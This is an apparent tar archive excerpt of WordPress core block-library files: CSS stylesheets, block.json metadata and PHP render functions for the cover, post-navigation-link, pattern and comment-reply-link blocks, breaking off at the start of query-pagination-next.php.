}latest-comments/style-rtl.min.css000060400000002431151330427370013117 0ustar00ol.wp-block-latest-comments{box-sizing:border-box;margin-right:0}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){line-height:1.1}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){line-height:1.8}.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){line-height:1.5}.wp-block-latest-comments .wp-block-latest-comments{padding-right:0}.wp-block-latest-comments__comment{list-style:none;margin-bottom:1em}.has-avatars .wp-block-latest-comments__comment{list-style:none;min-height:2.25em}.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{margin-right:3.25em}.wp-block-latest-comments__comment-excerpt p{font-size:.875em;margin:.36em 0 1.4em}.wp-block-latest-comments__comment-date{display:block;font-size:.75em}.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{border-radius:1.5em;display:block;float:right;height:2.5em;margin-left:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}cover.php000060400000004765151330427370006410 0ustar00<?php
/**
 * Server-side rendering of the `core/cover` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/cover` block on server.
 *
 * @since 6.0.0
 *
 * @param array  $attributes The block attributes.
 * @param string $content    The block rendered content.
 *
 * @return string Returns the cover block markup, if useFeaturedImage is true.
 */
function render_block_core_cover( $attributes, $content ) {
	if ( 'image' !== $attributes['backgroundType'] || false === $attributes['useFeaturedImage'] ) {
		return $content;
	}

	if ( ! ( $attributes['hasParallax'] || $attributes['isRepeated'] ) ) {
		$attr = array(
			'class'           => 'wp-block-cover__image-background',
			'data-object-fit' => 'cover',
		);

		if ( isset( $attributes['focalPoint'] ) ) {
			$object_position              = round( $attributes['focalPoint']['x'] * 100 ) . '% ' . round( $attributes['focalPoint']['y'] * 100 ) . '%';
			$attr['data-object-position'] = $object_position;
			$attr['style']                = 'object-position: ' . $object_position;
		}

		$image = get_the_post_thumbnail( null, 'post-thumbnail', $attr );

		/*
		 * Inserts the featured image between the (1st) cover 'background' `span` and 'inner_container' `div`,
		 * and removes eventual whitespace characters between the two (typically introduced at template level)
		 */
		$inner_container_start = '/<div\b[^>]+wp-block-cover__inner-container[\s|"][^>]*>/U';
		if ( 1 === preg_match( $inner_container_start, $content, $matches, PREG_OFFSET_CAPTURE ) ) {
			$offset  = $matches[0][1];
			$content = substr( $content, 0, $offset ) . $image . substr( $content, $offset );
		}
	} else {
		if ( in_the_loop() ) {
			update_post_thumbnail_cache();
		}
		$current_featured_image = get_the_post_thumbnail_url();
		if ( ! $current_featured_image ) {
			return $content;
		}

		$processor = new WP_HTML_Tag_Processor( $content );
		$processor->next_tag();

		$styles         = $processor->get_attribute( 'style' );
		$merged_styles  = ! empty( $styles ) ? $styles . ';' : '';
		$merged_styles .= 'background-image:url(' . esc_url( $current_featured_image ) . ');';

		$processor->set_attribute( 'style', $merged_styles );
		$content = $processor->get_updated_html();
	}

	return $content;
}

/**
 * Registers the `core/cover` block renderer on server.
 *
 * @since 6.0.0
 */
function register_block_core_cover() {
	register_block_type_from_metadata(
		__DIR__ . '/cover',
		array(
			'render_callback' => 'render_block_core_cover',
		)
	);
}
add_action( 'init', 'register_block_core_cover' );
template-part/editor.min.css000060400000003222151330427370012105 0ustar00.block-editor-template-part__selection-modal{z-index:1000001}.block-editor-template-part__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-editor-template-part__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-template-part__selection-search{background:#fff;padding:16px 0;position:sticky;top:0;z-index:2}.block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{outline-color:var(--wp-block-synced-color)}.is-dark-theme .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-dark-theme .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after{outline-color:#fff}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{border:none}template-part/theme-rtl.min.css000060400000000151151330427370012516 0ustar00:root :where(.wp-block-template-part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}template-part/theme.css000060400000000164151330427370011141 0ustar00:root :where(.wp-block-template-part.has-background){
  margin-bottom:0;
  margin-top:0;
  padding:1.25em 2.375em;
}template-part/block.json000060400000001240151330427370011306 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/template-part",
	"title": "Template Part",
	"category": "theme",
	"description": "Edit the different global regions of your site, like the header, footer, sidebar, or create your own.",
	"textdomain": "default",
	"attributes": {
		"slug": {
			"type": "string"
		},
		"theme": {
			"type": "string"
		},
		"tagName": {
			"type": "string"
		},
		"area": {
			"type": "string"
		}
	},
	"supports": {
		"align": true,
		"html": false,
		"reusable": false,
		"renaming": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-template-part-editor"
}
template-part/theme-rtl.css000060400000000164151330427370011740 0ustar00:root :where(.wp-block-template-part.has-background){
  margin-bottom:0;
  margin-top:0;
  padding:1.25em 2.375em;
}template-part/editor-rtl.css000060400000003332151330427370012124 0ustar00.block-editor-template-part__selection-modal{
  z-index:1000001;
}
.block-editor-template-part__selection-modal .block-editor-block-patterns-list{
  column-count:2;
  column-gap:24px;
}
@media (min-width:1280px){
  .block-editor-template-part__selection-modal .block-editor-block-patterns-list{
    column-count:3;
  }
}
.block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{
  break-inside:avoid-column;
}

.block-library-template-part__selection-search{
  background:#fff;
  padding:16px 0;
  position:sticky;
  top:0;
  z-index:2;
}
.block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{
  outline-color:var(--wp-block-synced-color);
}
.is-dark-theme .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-dark-theme .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after{
  outline-color:#fff;
}

.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{
  border:none;
}template-part/editor-rtl.min.css000060400000003222151330427370012704 0ustar00.block-editor-template-part__selection-modal{z-index:1000001}.block-editor-template-part__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-editor-template-part__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-template-part__selection-search{background:#fff;padding:16px 0;position:sticky;top:0;z-index:2}.block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{outline-color:var(--wp-block-synced-color)}.is-dark-theme .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-dark-theme .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after{outline-color:#fff}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{border:none}template-part/editor.css000060400000003332151330427370011325 0ustar00.block-editor-template-part__selection-modal{
  z-index:1000001;
}
.block-editor-template-part__selection-modal .block-editor-block-patterns-list{
  column-count:2;
  column-gap:24px;
}
@media (min-width:1280px){
  .block-editor-template-part__selection-modal .block-editor-block-patterns-list{
    column-count:3;
  }
}
.block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{
  break-inside:avoid-column;
}

.block-library-template-part__selection-search{
  background:#fff;
  padding:16px 0;
  position:sticky;
  top:0;
  z-index:2;
}
.block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{
  outline-color:var(--wp-block-synced-color);
}
.is-dark-theme .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-dark-theme .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after{
  outline-color:#fff;
}

.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{
  border:none;
}template-part/theme.min.css000060400000000151151330427370011717 0ustar00:root :where(.wp-block-template-part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}post-navigation-link.php000060400000011345151330427370011337 0ustar00<?php
/**
 * Server-side rendering of the `core/post-navigation-link` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-navigation-link` block on the server.
 *
 * @since 5.9.0
 *
 * @param array  $attributes Block attributes.
 * @param string $content    Block default content.
 *
 * @return string Returns the next or previous post link that is adjacent to the current post.
 */
function render_block_core_post_navigation_link( $attributes, $content ) {
	if ( ! is_singular() ) {
		return '';
	}

	// Get the navigation type to show the proper link. Available options are `next|previous`.
	$navigation_type = isset( $attributes['type'] ) ? $attributes['type'] : 'next';
	// Allow only `next` and `previous` in `$navigation_type`.
	if ( ! in_array( $navigation_type, array( 'next', 'previous' ), true ) ) {
		return '';
	}
	$classes = "post-navigation-link-$navigation_type";
	if ( isset( $attributes['textAlign'] ) ) {
		$classes .= " has-text-align-{$attributes['textAlign']}";
	}
	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => $classes,
		)
	);
	// Set default values.
	$format = '%link';
	$link   = 'next' === $navigation_type ? _x( 'Next', 'label for next post link' ) : _x( 'Previous', 'label for previous post link' );
	$label  = '';

	// Only use hardcoded values here, otherwise we need to add escaping where these values are used.
	$arrow_map = array(
		'none'    => '',
		'arrow'   => array(
			'next'     => '→',
			'previous' => '←',
		),
		'chevron' => array(
			'next'     => '»',
			'previous' => '«',
		),
	);

	// If a custom label is provided, make this a link.
	// `$label` is used to prepend the provided label, if we want to show the page title as well.
	if ( isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ) {
		$label = "{$attributes['label']}";
		$link  = $label;
	}

	// If we want to also show the page title, make the page title a link and prepend the label.
	if ( isset( $attributes['showTitle'] ) && $attributes['showTitle'] ) {
		/*
		 * If the label link option is not enabled but there is a custom label,
		 * display the custom label as text before the linked title.
		 */
		if ( ! $attributes['linkLabel'] ) {
			if ( $label ) {
				$format = '<span class="post-navigation-link__label">' . wp_kses_post( $label ) . '</span> %link';
			}
			$link = '%title';
		} elseif ( isset( $attributes['linkLabel'] ) && $attributes['linkLabel'] ) {
			// If the label link option is enabled and there is a custom label, display it before the title.
			if ( $label ) {
				$link = '<span class="post-navigation-link__label">' . wp_kses_post( $label ) . '</span> <span class="post-navigation-link__title">%title</span>';
			} else {
				/*
				 * If the label link option is enabled and there is no custom label,
				 * add a colon between the label and the post title.
				 */
				$label = 'next' === $navigation_type ? _x( 'Next:', 'label before the title of the next post' ) : _x( 'Previous:', 'label before the title of the previous post' );
				$link  = sprintf(
					'<span class="post-navigation-link__label">%1$s</span> <span class="post-navigation-link__title">%2$s</span>',
					wp_kses_post( $label ),
					'%title'
				);
			}
		}
	}

	// Display arrows.
	if ( isset( $attributes['arrow'] ) && 'none' !== $attributes['arrow'] && isset( $arrow_map[ $attributes['arrow'] ] ) ) {
		$arrow = $arrow_map[ $attributes['arrow'] ][ $navigation_type ];

		if ( 'next' === $navigation_type ) {
			$format = '%link<span class="wp-block-post-navigation-link__arrow-next is-arrow-' . $attributes['arrow'] . '" aria-hidden="true">' . $arrow . '</span>';
		} else {
			$format = '<span class="wp-block-post-navigation-link__arrow-previous is-arrow-' . $attributes['arrow'] . '" aria-hidden="true">' . $arrow . '</span>%link';
		}
	}

	/*
	 * The dynamic portion of the function name, `$navigation_type`,
	 * Refers to the type of adjacency, 'next' or 'previous'.
	 *
	 * @see https://developer.wordpress.org/reference/functions/get_previous_post_link/
	 * @see https://developer.wordpress.org/reference/functions/get_next_post_link/
	 */
	$get_link_function = "get_{$navigation_type}_post_link";

	if ( ! empty( $attributes['taxonomy'] ) ) {
		$content = $get_link_function( $format, $link, true, '', $attributes['taxonomy'] );
	} else {
		$content = $get_link_function( $format, $link );
	}

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/post-navigation-link` block on the server.
 *
 * @since 5.9.0
 */
function register_block_core_post_navigation_link() {
	register_block_type_from_metadata(
		__DIR__ . '/post-navigation-link',
		array(
			'render_callback' => 'render_block_core_post_navigation_link',
		)
	);
}
add_action( 'init', 'register_block_core_post_navigation_link' );
pattern.php000060400000004214151330427370006734 0ustar00<?php
/**
 * Server-side rendering of the `core/pattern` block.
 *
 * @package WordPress
 */

/**
 *  Registers the `core/pattern` block on the server.
 *
 * @since 5.9.0
 */
function register_block_core_pattern() {
	register_block_type_from_metadata(
		__DIR__ . '/pattern',
		array(
			'render_callback' => 'render_block_core_pattern',
		)
	);
}

/**
 * Renders the `core/pattern` block on the server.
 *
 * @since 6.3.0 Backwards compatibility: blocks with no `syncStatus` attribute do not receive block wrapper.
 *
 * @global WP_Embed $wp_embed Used to process embedded content within patterns
 *
 * @param array $attributes Block attributes.
 *
 * @return string Returns the output of the pattern.
 */
function render_block_core_pattern( $attributes ) {
	static $seen_refs = array();

	if ( empty( $attributes['slug'] ) ) {
		return '';
	}

	$slug     = $attributes['slug'];
	$registry = WP_Block_Patterns_Registry::get_instance();

	if ( ! $registry->is_registered( $slug ) ) {
		return '';
	}

	if ( isset( $seen_refs[ $attributes['slug'] ] ) ) {
		// WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent
		// is set in `wp_debug_mode()`.
		$is_debug = WP_DEBUG && WP_DEBUG_DISPLAY;

		return $is_debug ?
			// translators: Visible only in the front end, this warning takes the place of a faulty block. %s represents a pattern's slug.
			sprintf( __( '[block rendering halted for pattern "%s"]' ), $slug ) :
			'';
	}

	$pattern = $registry->get_registered( $slug );
	$content = $pattern['content'];

	// Backward compatibility for handling Block Hooks and injecting the theme attribute in the Gutenberg plugin.
	// This can be removed when the minimum supported WordPress is >= 6.4.
	if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN && ! function_exists( 'traverse_and_serialize_blocks' ) ) {
		$blocks  = parse_blocks( $content );
		$content = gutenberg_serialize_blocks( $blocks );
	}

	$seen_refs[ $attributes['slug'] ] = true;

	$content = do_blocks( $content );

	global $wp_embed;
	$content = $wp_embed->autoembed( $content );

	unset( $seen_refs[ $attributes['slug'] ] );
	return $content;
}

add_action( 'init', 'register_block_core_pattern' );
comment-reply-link.php000060400000004033151330427370011004 0ustar00<?php
/**
 * Server-side rendering of the `core/comment-reply-link` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comment-reply-link` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Return the post comment's reply link.
 */
function render_block_core_comment_reply_link( $attributes, $content, $block ) {
	if ( ! isset( $block->context['commentId'] ) ) {
		return '';
	}

	$thread_comments = get_option( 'thread_comments' );
	if ( ! $thread_comments ) {
		return '';
	}

	$comment = get_comment( $block->context['commentId'] );
	if ( empty( $comment ) ) {
		return '';
	}

	$depth     = 1;
	$max_depth = get_option( 'thread_comments_depth' );
	$parent_id = $comment->comment_parent;

	// Compute comment's depth iterating over its ancestors.
	while ( ! empty( $parent_id ) ) {
		++$depth;
		$parent_id = get_comment( $parent_id )->comment_parent;
	}

	$comment_reply_link = get_comment_reply_link(
		array(
			'depth'     => $depth,
			'max_depth' => $max_depth,
		),
		$comment
	);

	// Render nothing if the generated reply link is empty.
	if ( empty( $comment_reply_link ) ) {
		return;
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$comment_reply_link
	);
}

/**
 * Registers the `core/comment-reply-link` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comment_reply_link() {
	register_block_type_from_metadata(
		__DIR__ . '/comment-reply-link',
		array(
			'render_callback' => 'render_block_core_comment_reply_link',
		)
	);
}

add_action( 'init', 'register_block_core_comment_reply_link' );
navigation-link/editor-rtl.min.css000060400000004026151330427370013222 0ustar00.wp-block-navigation .block-list-appender{position:relative}.wp-block-navigation .has-child{cursor:pointer}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{z-index:29}.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;overflow:visible!important;visibility:visible!important;width:auto!important}.wp-block-navigation-item .wp-block-navigation-item__content{cursor:text}.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{min-width:20px}.wp-block-navigation-item .block-list-appender{margin:16px 16px 16px auto}.wp-block-navigation-link__invalid-item{color:#000}.wp-block-navigation-link__placeholder{background-image:none!important;box-shadow:none!important;position:relative;text-decoration:none!important}.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:var(--wp-admin-theme-color);background-image:linear-gradient(-45deg,#0000 20%,var(--wp-underline-color) 30%,var(--wp-underline-color) 36%,#0000 46%),linear-gradient(-135deg,#0000 54%,var(--wp-underline-color) 64%,var(--wp-underline-color) 70%,#0000 80%);background-position:100% 100%;background-repeat:repeat-x;background-size:6px 3px;padding-bottom:.1em}.is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:#fff}.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{cursor:pointer}.link-control-transform{border-top:1px solid #ccc;padding:0 16px 8px}.link-control-transform__subheading{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.link-control-transform__items{display:flex;justify-content:space-between}.link-control-transform__item{flex-basis:33%;flex-direction:column;gap:8px;height:auto}navigation-link/style.css000060400000000545151330427370011515 0ustar00.wp-block-navigation .wp-block-navigation-item__label{
  overflow-wrap:break-word;
}
.wp-block-navigation .wp-block-navigation-item__description{
  display:none;
}

.link-ui-tools{
  border-top:1px solid #f0f0f0;
  padding:8px;
}

.link-ui-block-inserter{
  padding-top:8px;
}

.link-ui-block-inserter__back{
  margin-left:8px;
  text-transform:uppercase;
}navigation-link/editor.css000060400000004316151330427370011643 0ustar00.wp-block-navigation .block-list-appender{
  position:relative;
}
.wp-block-navigation .has-child{
  cursor:pointer;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container{
  z-index:28;
}
.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{
  z-index:29;
}
.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{
  height:auto !important;
  min-width:200px !important;
  opacity:1 !important;
  overflow:visible !important;
  visibility:visible !important;
  width:auto !important;
}
.wp-block-navigation-item .wp-block-navigation-item__content{
  cursor:text;
}
.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{
  min-width:20px;
}
.wp-block-navigation-item .block-list-appender{
  margin:16px auto 16px 16px;
}

.wp-block-navigation-link__invalid-item{
  color:#000;
}
.wp-block-navigation-link__placeholder{
  background-image:none !important;
  box-shadow:none !important;
  position:relative;
  text-decoration:none !important;
}
.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{
  --wp-underline-color:var(--wp-admin-theme-color);
  background-image:linear-gradient(45deg, #0000 20%, var(--wp-underline-color) 30%, var(--wp-underline-color) 36%, #0000 46%), linear-gradient(135deg, #0000 54%, var(--wp-underline-color) 64%, var(--wp-underline-color) 70%, #0000 80%);
  background-position:0 100%;
  background-repeat:repeat-x;
  background-size:6px 3px;
  padding-bottom:.1em;
}
.is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{
  --wp-underline-color:#fff;
}
.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{
  cursor:pointer;
}
.link-control-transform{
  border-top:1px solid #ccc;
  padding:0 16px 8px;
}

.link-control-transform__subheading{
  color:#1e1e1e;
  font-size:11px;
  font-weight:500;
  margin-bottom:1.5em;
  text-transform:uppercase;
}

.link-control-transform__items{
  display:flex;
  justify-content:space-between;
}

.link-control-transform__item{
  flex-basis:33%;
  flex-direction:column;
  gap:8px;
  height:auto;
}navigation-link/editor.min.css000060400000004021151330427370012416 0ustar00.wp-block-navigation .block-list-appender{position:relative}.wp-block-navigation .has-child{cursor:pointer}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{z-index:29}.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;overflow:visible!important;visibility:visible!important;width:auto!important}.wp-block-navigation-item .wp-block-navigation-item__content{cursor:text}.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{min-width:20px}.wp-block-navigation-item .block-list-appender{margin:16px auto 16px 16px}.wp-block-navigation-link__invalid-item{color:#000}.wp-block-navigation-link__placeholder{background-image:none!important;box-shadow:none!important;position:relative;text-decoration:none!important}.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:var(--wp-admin-theme-color);background-image:linear-gradient(45deg,#0000 20%,var(--wp-underline-color) 30%,var(--wp-underline-color) 36%,#0000 46%),linear-gradient(135deg,#0000 54%,var(--wp-underline-color) 64%,var(--wp-underline-color) 70%,#0000 80%);background-position:0 100%;background-repeat:repeat-x;background-size:6px 3px;padding-bottom:.1em}.is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:#fff}.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{cursor:pointer}.link-control-transform{border-top:1px solid #ccc;padding:0 16px 8px}.link-control-transform__subheading{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.link-control-transform__items{display:flex;justify-content:space-between}.link-control-transform__item{flex-basis:33%;flex-direction:column;gap:8px;height:auto}navigation-link/style-rtl.min.css000060400000000500151330427370013065 0ustar00.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}.link-ui-tools{border-top:1px solid #f0f0f0;padding:8px}.link-ui-block-inserter{padding-top:8px}.link-ui-block-inserter__back{margin-right:8px;text-transform:uppercase}navigation-link/style.min.css000060400000000477151330427370012303 0ustar00.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}.link-ui-tools{border-top:1px solid #f0f0f0;padding:8px}.link-ui-block-inserter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}navigation-link/editor-rtl.css000060400000004323151330427370012440 0ustar00.wp-block-navigation .block-list-appender{
  position:relative;
}
.wp-block-navigation .has-child{
  cursor:pointer;
}
.wp-block-navigation .has-child .wp-block-navigation__submenu-container{
  z-index:28;
}
.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{
  z-index:29;
}
.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{
  height:auto !important;
  min-width:200px !important;
  opacity:1 !important;
  overflow:visible !important;
  visibility:visible !important;
  width:auto !important;
}
.wp-block-navigation-item .wp-block-navigation-item__content{
  cursor:text;
}
.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{
  min-width:20px;
}
.wp-block-navigation-item .block-list-appender{
  margin:16px 16px 16px auto;
}

.wp-block-navigation-link__invalid-item{
  color:#000;
}
.wp-block-navigation-link__placeholder{
  background-image:none !important;
  box-shadow:none !important;
  position:relative;
  text-decoration:none !important;
}
.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{
  --wp-underline-color:var(--wp-admin-theme-color);
  background-image:linear-gradient(-45deg, #0000 20%, var(--wp-underline-color) 30%, var(--wp-underline-color) 36%, #0000 46%), linear-gradient(-135deg, #0000 54%, var(--wp-underline-color) 64%, var(--wp-underline-color) 70%, #0000 80%);
  background-position:100% 100%;
  background-repeat:repeat-x;
  background-size:6px 3px;
  padding-bottom:.1em;
}
.is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{
  --wp-underline-color:#fff;
}
.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{
  cursor:pointer;
}
.link-control-transform{
  border-top:1px solid #ccc;
  padding:0 16px 8px;
}

.link-control-transform__subheading{
  color:#1e1e1e;
  font-size:11px;
  font-weight:500;
  margin-bottom:1.5em;
  text-transform:uppercase;
}

.link-control-transform__items{
  display:flex;
  justify-content:space-between;
}

.link-control-transform__item{
  flex-basis:33%;
  flex-direction:column;
  gap:8px;
  height:auto;
}navigation-link/block.json000060400000003326151330427370011630 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/navigation-link",
	"title": "Custom Link",
	"category": "design",
	"parent": [ "core/navigation" ],
	"allowedBlocks": [
		"core/navigation-link",
		"core/navigation-submenu",
		"core/page-list"
	],
	"description": "Add a page, link, or another item to your navigation.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		},
		"type": {
			"type": "string"
		},
		"description": {
			"type": "string"
		},
		"rel": {
			"type": "string"
		},
		"id": {
			"type": "number"
		},
		"opensInNewTab": {
			"type": "boolean",
			"default": false
		},
		"url": {
			"type": "string"
		},
		"title": {
			"type": "string"
		},
		"kind": {
			"type": "string"
		},
		"isTopLevelLink": {
			"type": "boolean"
		}
	},
	"usesContext": [
		"textColor",
		"customTextColor",
		"backgroundColor",
		"customBackgroundColor",
		"overlayTextColor",
		"customOverlayTextColor",
		"overlayBackgroundColor",
		"customOverlayBackgroundColor",
		"fontSize",
		"customFontSize",
		"showSubmenuIcon",
		"maxNestingLevel",
		"style"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"__experimentalSlashInserter": true,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"renaming": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-navigation-link-editor",
	"style": "wp-block-navigation-link"
}
navigation-link/style-rtl.css000060400000000546151330427370012315 0ustar00.wp-block-navigation .wp-block-navigation-item__label{
  overflow-wrap:break-word;
}
.wp-block-navigation .wp-block-navigation-item__description{
  display:none;
}

.link-ui-tools{
  border-top:1px solid #f0f0f0;
  padding:8px;
}

.link-ui-block-inserter{
  padding-top:8px;
}

.link-ui-block-inserter__back{
  margin-right:8px;
  text-transform:uppercase;
}query-pagination-next.php000060400000007313151330427370011532 0ustar00<?php
/**
 * Server-side rendering of the `core/query-pagination-next` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/query-pagination-next` block on the server.
 *
 * @since 5.8.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
